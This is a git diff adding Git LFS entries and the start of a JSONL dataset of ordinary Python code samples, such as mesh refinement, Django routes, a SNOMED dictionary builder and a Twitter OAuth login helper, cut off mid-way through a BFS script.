diff --git a/.gitattributes b/.gitattributes index 1ef325f1b111266a6b26e0196871bd78baa8c2f3..1639ae9872a078113cc444d21de7d39dd97907e0 100644 --- a/.gitattributes +++ b/.gitattributes @@ -57,3 +57,70 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text # Video files - compressed *.mp4 filter=lfs diff=lfs merge=lfs -text *.webm filter=lfs diff=lfs merge=lfs -text +1042.jsonl filter=lfs diff=lfs merge=lfs -text +1114.jsonl filter=lfs diff=lfs merge=lfs -text +1020.jsonl filter=lfs diff=lfs merge=lfs -text +1176.jsonl filter=lfs diff=lfs merge=lfs -text +1125.jsonl filter=lfs diff=lfs merge=lfs -text +1099.jsonl filter=lfs diff=lfs merge=lfs -text +1068.jsonl filter=lfs diff=lfs merge=lfs -text +056.jsonl filter=lfs diff=lfs merge=lfs -text +1163.jsonl filter=lfs diff=lfs merge=lfs -text +1110.jsonl filter=lfs diff=lfs merge=lfs -text +1204.jsonl filter=lfs diff=lfs merge=lfs -text +115.jsonl filter=lfs diff=lfs merge=lfs -text +012.jsonl filter=lfs diff=lfs merge=lfs -text +1101.jsonl filter=lfs diff=lfs merge=lfs -text +1198.jsonl filter=lfs diff=lfs merge=lfs -text +1002.jsonl filter=lfs diff=lfs merge=lfs -text +1150.jsonl filter=lfs diff=lfs merge=lfs -text +1189.jsonl filter=lfs diff=lfs merge=lfs -text +1248.jsonl filter=lfs diff=lfs merge=lfs -text +1086.jsonl filter=lfs diff=lfs merge=lfs -text +1062.jsonl filter=lfs diff=lfs merge=lfs -text +1015.jsonl filter=lfs diff=lfs merge=lfs -text +030.jsonl filter=lfs diff=lfs merge=lfs -text +1257.jsonl filter=lfs diff=lfs merge=lfs -text +003.jsonl filter=lfs diff=lfs merge=lfs -text +1149.jsonl filter=lfs diff=lfs merge=lfs -text +072.jsonl filter=lfs diff=lfs merge=lfs -text +1044.jsonl filter=lfs diff=lfs merge=lfs -text +016.jsonl filter=lfs diff=lfs merge=lfs -text +1260.jsonl filter=lfs diff=lfs merge=lfs -text +1095.jsonl filter=lfs diff=lfs merge=lfs -text +1206.jsonl filter=lfs diff=lfs merge=lfs -text +009.jsonl filter=lfs diff=lfs merge=lfs -text +102.jsonl filter=lfs diff=lfs merge=lfs -text +1215.jsonl filter=lfs diff=lfs merge=lfs -text +119.jsonl filter=lfs diff=lfs merge=lfs -text +1082.jsonl filter=lfs diff=lfs merge=lfs -text +117.jsonl filter=lfs diff=lfs merge=lfs -text +1141.jsonl filter=lfs diff=lfs merge=lfs -text +1170.jsonl filter=lfs diff=lfs merge=lfs -text +1123.jsonl filter=lfs diff=lfs merge=lfs -text +1037.jsonl filter=lfs diff=lfs merge=lfs -text +1235.jsonl filter=lfs diff=lfs merge=lfs -text +1161.jsonl filter=lfs diff=lfs merge=lfs -text +1019.jsonl filter=lfs diff=lfs merge=lfs -text +045.jsonl filter=lfs diff=lfs merge=lfs -text +078.jsonl filter=lfs diff=lfs merge=lfs -text +1132.jsonl filter=lfs diff=lfs merge=lfs -text +069.jsonl filter=lfs diff=lfs merge=lfs -text +047.jsonl filter=lfs diff=lfs merge=lfs -text +1244.jsonl filter=lfs diff=lfs merge=lfs -text +1071.jsonl filter=lfs diff=lfs merge=lfs -text +1190.jsonl filter=lfs diff=lfs merge=lfs -text +1143.jsonl filter=lfs diff=lfs merge=lfs -text +111.jsonl filter=lfs diff=lfs merge=lfs -text +027.jsonl filter=lfs diff=lfs merge=lfs -text +096.jsonl filter=lfs diff=lfs merge=lfs -text +1079.jsonl filter=lfs diff=lfs merge=lfs -text +1097.jsonl filter=lfs diff=lfs merge=lfs -text +087.jsonl filter=lfs diff=lfs merge=lfs -text +1136.jsonl filter=lfs diff=lfs merge=lfs -text +1200.jsonl filter=lfs diff=lfs merge=lfs -text +063.jsonl filter=lfs diff=lfs merge=lfs -text +074.jsonl filter=lfs diff=lfs merge=lfs -text +034.jsonl filter=lfs diff=lfs merge=lfs -text +083.jsonl filter=lfs diff=lfs merge=lfs -text +1046.jsonl filter=lfs diff=lfs merge=lfs 
-text diff --git a/003.jsonl b/003.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcfec1c72cdb041adbabac2b0c24be8c5ee76796 --- /dev/null +++ b/003.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44ae63f003ddd17901e26d5deb4f271e331b4f0063f4ce18b2922ae01d470346 +size 62465952 diff --git a/009.jsonl b/009.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8d2c49012ea8ed432544c3437d4bf44e868bb79 --- /dev/null +++ b/009.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b52c0594d7a9159874394b1735fccdecafa8c26ccc4f27acd8e91adb86b397c +size 66633397 diff --git a/012.jsonl b/012.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97e6f31b709c484df75f6db9ebe02bcc78e24ee4 --- /dev/null +++ b/012.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:868a872d7dad63f05d7ce4f98c043828d214d259eacdfa70e649a6b5a96932bf +size 27674199 diff --git a/016.jsonl b/016.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b38a8c83b228d5ebdac5de1343cd66d9a5710e65 --- /dev/null +++ b/016.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fb4d556e137ba407395f6ed3de6b6538c65d7865edcd4f7401a5d44bf1cd141 +size 62515203 diff --git a/027.jsonl b/027.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a57b47c76c2c077b00f87afad359bbde54c5dd59 --- /dev/null +++ b/027.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8091aa68fce5eb3e79010a1a5bbaaa229d303ca37bae94f6b7a2006acc32fbe +size 72051972 diff --git a/030.jsonl b/030.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f5d3bd0c005dcbce7af85ef0b9902b85128f6e9 --- /dev/null +++ b/030.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e340c753841723563f1ec17c4cfa68e668c2f0ab66632fcac28d80c6aa579624 +size 58807288 diff --git a/034.jsonl b/034.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..237b926b0cf59ceb4fa92567f74c68c51a23513c --- /dev/null +++ b/034.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d57da88aba37196e573503fec37af3aa852c03bd400441e48e8cd0c20fb8599 +size 73566787 diff --git a/045.jsonl b/045.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7fa8c0917e3d2486554d5c2c09d5dd044f962f9 --- /dev/null +++ b/045.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:846e19b9c082f0e695486b9abb24f011811988408cf8f2d78b7a29030f31ccca +size 64320832 diff --git a/047.jsonl b/047.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..57eb8386bbcb27bd545d1ddb9678dab4122acb52 --- /dev/null +++ b/047.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0b6c3fa30b97c8281454b37ca161dffbba7482e92d6d4d26067d0d29e85d9c3 +size 61044234 diff --git a/056.jsonl b/056.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..762a1c5ff7bfd9a12dd93a44ad48c7e5251efef8 --- /dev/null +++ b/056.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6c5030f5d0fbee29e062aaa0db899663736f3bab845d40c1d0cf502e6330533 +size 14836702 diff --git a/063.jsonl b/063.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07b341238005ecde1df2d909756f9d518d2054b4 --- /dev/null +++ b/063.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:7d42aa12a29895051e870b330d8030d6352c1a7c21be381f4ae2ea18428bff7f +size 69533351 diff --git a/069.jsonl b/069.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51542371b94bb5cf23f1a23ac09f7c88d66f35de --- /dev/null +++ b/069.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:563720158de887bac29ab90dbc881ea5bdb903207e38fced16e58edabd49bc0d +size 64473856 diff --git a/072.jsonl b/072.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49c688e584c047a1f543e6419ec106196035be2f --- /dev/null +++ b/072.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4459352caabe24ee53280b95921856232187d1c85c439ed630a793434134c2b9 +size 60353398 diff --git a/074.jsonl b/074.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b5a15df41aa20e16f03be405dd8a7a5eb020f7ae --- /dev/null +++ b/074.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf86d7163814ff2b4be9795491941d40c9ddefaf394fd9fa541fbc729df13417 +size 70376928 diff --git a/078.jsonl b/078.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..92ca81f0927f5e14a463a344e7b04476134e769e --- /dev/null +++ b/078.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ef8010c9b9e744fa5f136e82d772fa94593a08f5abb4eecde3f77d04c9076ed +size 65437446 diff --git a/083.jsonl b/083.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8f5133a9639250e35a964ac85a102d135ec940c --- /dev/null +++ b/083.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79656d7237435272c5c163ee8bc0a825f4f81ae4d0f4213e2ce0e8d77466794b +size 70192158 diff --git a/087.jsonl b/087.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6d5b45aa8a3159edbb129ec3e3463981531d8fc --- /dev/null +++ b/087.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1831046f3b4f8ddf97ffa1e708d118300dc0deb3cb669871ce463eab690af724 +size 70537929 diff --git a/096.jsonl b/096.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07f23036c643b2874db546ebf5b752e2a065fedd --- /dev/null +++ b/096.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8ac08b191fd18c5c5db176c2c39cb34ce57b33f6beae66203f3c075ebf30103 +size 71491602 diff --git a/1000.jsonl b/1000.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..79a4100b3ec4c6907467ff5fa29566a868f04ca9 --- /dev/null +++ b/1000.jsonl @@ -0,0 +1,491 @@ +{"seq_id": "251653677", "text": "import os\nimport logging\nfrom typing import ( # noqa\n Any,\n Coroutine,\n Generator,\n Generic,\n Iterable,\n List,\n Mapping,\n Optional,\n Set,\n Tuple,\n Type,\n TypeVar,\n Union,\n)\n\nimport porepy as pp\nimport numpy as np\nimport scipy.sparse as sps\n\n# --- LOGGING UTIL ---\ntry:\n from src.mastersproject.util.logging_util import timer, trace\nexcept ImportError:\n from util.logging_util import timer, trace\n\nlogger = logging.getLogger(__name__)\n\n\n@trace(logger)\ndef refine_mesh(\n in_file: str,\n out_file: str,\n dim: int,\n network: Union[pp.FractureNetwork3d, pp.FractureNetwork2d],\n num_refinements: int = 1,\n) -> List[pp.GridBucket]:\n \"\"\" Refine a mesh by splitting, using gmsh\n\n Parameters\n ----------\n in_file : str\n path to .geo file to read\n out_file : str\n path to new .msh file to store mesh in, excluding the ending '.msh'.\n dim : int {2, 3}\n Dimension of domain to mesh\n network : 
Union[pp.FractureNetwork2d, pp.FractureNetwork3d]\n PorePy class defining the fracture network that is described by the .geo in_file\n num_refinements : int : Optional. Default = 1\n Number of refinements\n \"\"\"\n\n try:\n import gmsh\n except ModuleNotFoundError:\n raise ModuleNotFoundError(\n \"To run gmsh python api on your system, \"\n \"download the relevant gmsh*-sdk.* from http://gmsh.info/bin/. \"\n \"Then, Add the 'lib' directory from the SDK to PYTHONPATH: \\n\"\n \"export PYTHONPATH=${PYTHONPATH}:path/to/gmsh*-sdk.*/lib\"\n )\n\n from porepy.fracs.simplex import tetrahedral_grid_from_gmsh\n from porepy.fracs.meshing import grid_list_to_grid_bucket\n\n assert os.path.isfile(in_file)\n\n # Run gmsh\n gmsh.initialize()\n gmsh.open(in_file)\n gmsh.model.mesh.generate(dim=dim)\n if out_file[-4:] == \".msh\":\n out_file = out_file[:-4]\n\n # Save coarsest grid\n fname = f\"{out_file}_0.msh\"\n gmsh.write(fname)\n grid_list_ref = tetrahedral_grid_from_gmsh(network=network, file_name=fname)\n gb_list = [grid_list_to_grid_bucket(grid_list_ref)]\n\n for i in range(num_refinements):\n gmsh.model.mesh.refine() # Refined grid\n\n fname = f\"{out_file}_{i + 1}.msh\"\n gmsh.write(fname)\n\n # Create grid bucket from refined grid output\n grid_list_ref = tetrahedral_grid_from_gmsh(network=network, file_name=fname)\n gb_ref = grid_list_to_grid_bucket(grid_list_ref)\n gb_list.append(gb_ref.copy())\n\n gmsh.finalize()\n return gb_list\n\n\n@trace(logger)\ndef gb_coarse_fine_cell_mapping(gb: pp.GridBucket, gb_ref: pp.GridBucket, tol=1e-8):\n \"\"\" Wrapper for coarse_fine_cell_mapping to construct mapping for grids in GridBucket.\n\n Adds a node_prop to each grid in gb. The key is 'coarse_fine_cell_mapping',\n and is the mapping generated by 'coarse_fine_cell_mapping(...)'.\n\n Note: No node prop is added to the reference grids in gb_ref.\n\n Parameters\n ----------\n gb : pp.GridBucket\n Coarse grid bucket\n gb_ref : pp.GridBucket\n Refined grid bucket\n tol : float, Optional\n Tolerance for point_in_poly* -methods\n \"\"\"\n\n grids = gb.get_grids()\n grids_ref = gb_ref.get_grids()\n\n assert len(grids) == len(\n grids_ref\n ), \"Weakly check that GridBuckets refer to same domains\"\n assert np.allclose(\n np.append(*gb.bounding_box()), np.append(*gb_ref.bounding_box())\n ), \"Weakly check that GridBuckets refer to same domains\"\n\n # This method assumes a consistent node ordering between grids. At least assign one.\n gb.assign_node_ordering(overwrite_existing=False)\n gb_ref.assign_node_ordering(overwrite_existing=False)\n\n n_grids = len(grids)\n # mappings = [None]*n_grids\n mappings = {\"gb\": gb, \"gb_ref\": gb_ref}\n\n # Add node prop on the coarse grid to map from coarse to fine cells.\n gb.add_node_props(keys=\"coarse_fine_cell_mapping\")\n\n for i in np.arange(n_grids):\n g, g_ref = grids[i], grids_ref[i]\n node_num, node_num_ref = (\n gb._nodes[g][\"node_number\"],\n gb_ref._nodes[g_ref][\"node_number\"],\n )\n assert node_num == node_num_ref, \"Weakly check that grids refer to same domain.\"\n\n mapping = coarse_fine_cell_mapping(g, g_ref, tol=tol)\n gb.set_node_prop(g=g, key=\"coarse_fine_cell_mapping\", val=mapping)\n\n\n@trace(logger)\ndef coarse_fine_cell_mapping(g: pp.Grid, g_ref: pp.Grid, tol=1e-8,) -> sps.csc_matrix:\n \"\"\" Construct a mapping between cells of a grid and its refined version\n\n Assuming a regular and a refined mesh, where the refinement is executed by splitting.\n I.e. 
a cell in the refined grid is completely contained within a cell in the\n coarse grid.\n\n Parameters\n ----------\n g : pp.Grid\n Coarse grid\n g_ref : pp.Grid\n Refined grid\n tol : float, Optional\n Tolerance for pp.geometry_property_checks.point_in_polyhedron()\n\n Returns\n -------\n coarse_fine : sps.csc_matrix\n Column major sparse matrix mapping from coarse to fine cells.\n \"\"\"\n\n assert g.num_cells < g_ref.num_cells, \"Wrong order of input grids\"\n assert g.dim == g_ref.dim, \"Grids must be of same dimension\"\n\n cell_nodes = g.cell_nodes()\n slices = zip(\n cell_nodes.indptr[:-1], cell_nodes.indptr[1:]\n ) # start/end row pointers for each column\n\n # Create sps.csc_matrix mapping coarse cells to fine cell centers\n indptr = np.array([0])\n indices = np.empty(0)\n\n cells_ref = g_ref.cell_centers.copy() # Cell centers in fine grid\n test_cells_ptr = np.arange(g_ref.num_cells) # Pointer to cell centers\n nodes = g.nodes.copy()\n\n if g.dim == 1:\n nodes = nodes.copy()\n tangent = pp.map_geometry.compute_tangent(nodes)\n reference = [1, 0, 0]\n R = pp.map_geometry.project_line_matrix(\n nodes, tangent, tol=tol, reference=reference\n )\n nodes = R.dot(nodes)[0, :]\n cells_ref = R.dot(cells_ref)[0, :]\n\n elif g.dim == 2: # Pre-processing for efficiency\n nodes = nodes.copy()\n R = pp.map_geometry.project_plane_matrix(nodes, check_planar=False)\n nodes = np.dot(R, nodes)[:2, :]\n cells_ref = np.dot(R, cells_ref)[:2, :]\n\n # Loop through every coarse cell\n for st, nd in slices:\n\n nodes_idx = cell_nodes.indices[st:nd]\n num_nodes = nodes_idx.size\n\n if g.dim == 1:\n assert num_nodes == 2\n line = np.sort(nodes[nodes_idx])\n test_points = cells_ref[test_cells_ptr]\n in_poly = np.searchsorted(line, test_points, side=\"left\") == 1\n\n elif g.dim == 2:\n assert num_nodes == 3, \"We assume simplexes in 2D (i.e. 3 nodes)\"\n polygon = nodes[:, nodes_idx]\n test_points = cells_ref[:, test_cells_ptr]\n in_poly = pp.geometry_property_checks.point_in_polygon(\n polygon, test_points, tol=tol\n )\n\n elif g.dim == 3:\n # Make polyhedron from node coordinates\n # Polyhedron defined as a list of nodes defining its (convex) faces.\n # Assumes simplexes: Every node except one defines every face.\n assert num_nodes == 4, \"We assume simplexes in 3D (i.e. 4 nodes)\"\n node_coords = nodes[:, nodes_idx]\n\n ids = np.arange(num_nodes)\n polyhedron = [node_coords[:, ids != i] for i in np.arange(num_nodes)]\n test_points = cells_ref[\n :, test_cells_ptr\n ] # Test only points not inside another polyhedron.\n in_poly = pp.geometry_property_checks.point_in_polyhedron(\n polyhedron=polyhedron, test_points=test_points, tol=tol\n )\n\n else:\n logger.warning(f\"A grid of dimension {g.dim} encountered. 
Skip!\")\n continue\n\n # Update pointer to which cell centers to use as test points\n in_poly_ids = test_cells_ptr[in_poly] # id of cells inside this polyhedron\n test_cells_ptr = test_cells_ptr[\n ~in_poly\n ] # Keep only cells not inside this polyhedron\n\n # Update mapping\n indices = np.append(indices, in_poly_ids)\n indptr = np.append(indptr, indptr[-1] + in_poly_ids.size)\n\n data = np.ones(indices.size)\n\n coarse_fine = sps.csc_matrix((data, indices, indptr))\n\n assert (\n indices.size == g_ref.num_cells\n ), \"Every fine cell should be inside exactly one coarse cell\"\n return coarse_fine\n", "sub_path": "src/mastersproject/refinement/refinement.py", "file_name": "refinement.py", "file_ext": "py", "file_size_in_byte": 8514, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 37, "usage_type": "name"}, {"api_name": "porepy.FractureNetwork3d", "line_number": 37, "usage_type": "attribute"}, {"api_name": "porepy.FractureNetwork2d", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "gmsh.initialize", "line_number": 72, "usage_type": "call"}, {"api_name": "gmsh.open", "line_number": 73, "usage_type": "call"}, {"api_name": "gmsh.model.mesh.generate", "line_number": 74, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 74, "usage_type": "attribute"}, {"api_name": "gmsh.write", "line_number": 80, "usage_type": "call"}, {"api_name": "porepy.fracs.simplex.tetrahedral_grid_from_gmsh", "line_number": 81, "usage_type": "call"}, {"api_name": "porepy.fracs.meshing.grid_list_to_grid_bucket", "line_number": 82, "usage_type": "call"}, {"api_name": "gmsh.model.mesh.refine", "line_number": 85, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 85, "usage_type": "attribute"}, {"api_name": "gmsh.write", "line_number": 88, "usage_type": "call"}, {"api_name": "porepy.fracs.simplex.tetrahedral_grid_from_gmsh", "line_number": 91, "usage_type": "call"}, {"api_name": "porepy.fracs.meshing.grid_list_to_grid_bucket", "line_number": 92, "usage_type": "call"}, {"api_name": "gmsh.finalize", "line_number": 95, "usage_type": "call"}, {"api_name": "util.logging_util.trace", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 39, "usage_type": "name"}, {"api_name": "porepy.GridBucket", "line_number": 39, "usage_type": "attribute"}, {"api_name": "porepy.GridBucket", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "util.logging_util.trace", "line_number": 99, "usage_type": "call"}, {"api_name": "porepy.Grid", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "porepy.map_geometry.compute_tangent", "line_number": 192, "usage_type": "call"}, {"api_name": "porepy.map_geometry", "line_number": 192, "usage_type": "attribute"}, {"api_name": "porepy.map_geometry.project_line_matrix", 
"line_number": 194, "usage_type": "call"}, {"api_name": "porepy.map_geometry", "line_number": 194, "usage_type": "attribute"}, {"api_name": "porepy.map_geometry.project_plane_matrix", "line_number": 202, "usage_type": "call"}, {"api_name": "porepy.map_geometry", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.searchsorted", "line_number": 216, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks.point_in_polygon", "line_number": 222, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks", "line_number": 222, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 234, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks.point_in_polyhedron", "line_number": 238, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.append", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 256, "usage_type": "call"}, {"api_name": "scipy.sparse.csc_matrix", "line_number": 258, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 258, "usage_type": "name"}, {"api_name": "util.logging_util.trace", "line_number": 151, "usage_type": "call"}, {"api_name": "scipy.sparse.csc_matrix", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 152, "usage_type": "name"}]} +{"seq_id": "341652372", "text": "from django.urls import path\nfrom . 
import views\n\napp_name = 'trip'\n\nurlpatterns = [\n path('list', views.trip_list),\n path('chk/', views.checkID),\n path('idealtag', views.idealtag),\n path('idealcategory', views.idealcategory),\n path('store_detail/', views.store_detail),\n path('today', views.trip_today),\n path('delete/', views.delete_trip),\n path('date_chk', views.date_chk),\n path('delete/date_chk', views.delete_date_chk),\n]", "sub_path": "backend/sikdorang/trip/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 491, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "437364404", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\n\n@ author: Taehyeong Kim\n@ e-mail: taehyeong93@korea.ac.kr\n\n\"\"\"\n\n\nimport pandas as pd\nimport re\nfrom keras.preprocessing.text import text_to_word_sequence\n\n\nclass SNOMED:\n \n def __init__(self):\n print(\"--- SNOMED ---\")\n \n def SNOMED_dictionary(self):\n \n # SNOMED Dictionary\n snomed=pd.read_csv(\"data/SNOMED.csv\")\n snomed_series=snomed[\"concept_name\"].dropna()\n snomed_list=list(snomed_series.unique())\n snomed_list=[x for x in snomed_list if x]\n\n dict_word=[]\n for _ in range(len(snomed_list)):\n\n temp_words = text_to_word_sequence(snomed_list[_]) #Tokenizer\n\n for _ in temp_words:\n if len(_)>1:\n result = re.sub('[^a-zA-Z]', '', _)\n dict_word.append(result)\n\n # Generate Dictionary\n with open('data/SNOMED_dictionary.txt', 'w') as f:\n for item in dict_word:\n f.write(\"%s\\n\" % item)\n\n dict_corpus = sorted(list(set(dict_word)))\n dict_corpus = [x for x in dict_corpus if x]\n print(\"Corpus count:\" + str(len(dict_corpus)))\n \n # Generate Corpus\n with open('data/misspelling_detection.txt', 'w') as f:\n for item in dict_corpus:\n f.write(\"%s\\n\" % item)\n", "sub_path": "utils/SNOMED.py", "file_name": "SNOMED.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.text_to_word_sequence", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "129030125", "text": "from models.user import User\nimport constants\nimport oauth2\nimport urllib.parse as urlparse\nfrom twitter_utils import consumer, get_request_token\n\n\ndef create_authorized_user(email, first_name, last_name):\n request_token = get_request_token()\n print('Please click the following link to get a pin')\n print('{}?oauth_token={}'.format(constants.AUTHORIZATION_URL, request_token['oauth_token']))\n verified_pin = input('Please enter the pin received from Tweeter: ')\n token = oauth2.Token(request_token['oauth_token'], request_token['oauth_token_secret'])\n 
token.set_verifier(verified_pin)\n client = oauth2.Client(consumer, token)\n response, content = client.request(constants.ACCESS_TOKEN_URL, 'POST')\n access_token = dict(urlparse.parse_qsl(content.decode('utf-8')))\n user = User(email, first_name, last_name, access_token['oauth_token'], access_token['oauth_token_secret'])\n user.save_to_db()\n return user\n", "sub_path": "login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "twitter_utils.get_request_token", "line_number": 9, "usage_type": "call"}, {"api_name": "constants.AUTHORIZATION_URL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "oauth2.Token", "line_number": 13, "usage_type": "call"}, {"api_name": "oauth2.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "twitter_utils.consumer", "line_number": 15, "usage_type": "argument"}, {"api_name": "constants.ACCESS_TOKEN_URL", "line_number": 16, "usage_type": "attribute"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 17, "usage_type": "name"}, {"api_name": "models.user.User", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "223985935", "text": "from repetitive import RepetitiveTask\n\nimport requests\n\n\nclass Task(RepetitiveTask):\n \"\"\"\n Get a notification when one of a list of Github repositories has a new latest release\n \"\"\"\n\n repos = ['RetroPie/RetroPie-Setup']\n\n def run(self):\n data = self.load()\n\n for repo in self.repos:\n response = requests.get('https://github.com/{}/releases/latest'.format(repo))\n version = response.url.rsplit('/', 1)[-1]\n\n if repo in data:\n if data[repo] != version:\n self.notify(\"{} has been upgrade to version {}\".format(repo, version))\n else:\n self.log(\"{} has not been updated\".format(repo))\n\n data[repo] = version\n\n self.save(data)\n", "sub_path": "hour/github_release.py", "file_name": "github_release.py", "file_ext": "py", "file_size_in_byte": 769, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "repetitive.RepetitiveTask", "line_number": 6, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "436896703", "text": "import pandas as pd\n\ndef makeGraph(i_file):\n\tfile_to_list = [l.split(' ') for l in i_file.read().split('\\n')]\n\t# print(file_to_list)\n\tdf = pd.DataFrame(file_to_list)\n\t\n\tweights = {df[1][i]:{df[2][i]}for i in df}\n\n\t# print(\"len df: \" , len(df))\n\tgraph = {}\n\t# for i in range(len(df)):\n\t\t# print(df['0'].loc(i))\n\t\t# graph[df[0].loc(i)] = weights[i] \n\tgraph = {df[0][i]:{df[1][i]:df[2][i]} for i in df}\n\n\t# print(graph)\n\n\ndef BFS(graph, start, end):\n\n\tfrom collections import deque\n\tprint(\"----------BFS---------\\n\")\n\tqueue = deque([start])\n\tprint('graph: ' , graph)\n\n\t#dictionary of previous nodes with the leading node (key - previous, value - node of path taken) \n\tprev_nodes = {}\n\t#list of the nodes for the path taken\n\tmapping = []\n\n\t#loop through nodes in path until queue is empty\n\twhile queue:\n\t\t# print('queue: ', queue)\n\t\t#grab the current node to inspect for possible paths\n\t\tnode = queue.popleft()\n\t\t# print('node: ', node)\n\n\t\t#check if te node leads anywhere\n\t\tif node in graph:\n\n\t\t\tfor neighbor in graph:\n\n\t\t\t\t#if explored, ignore it\n\t\t\t\tif 
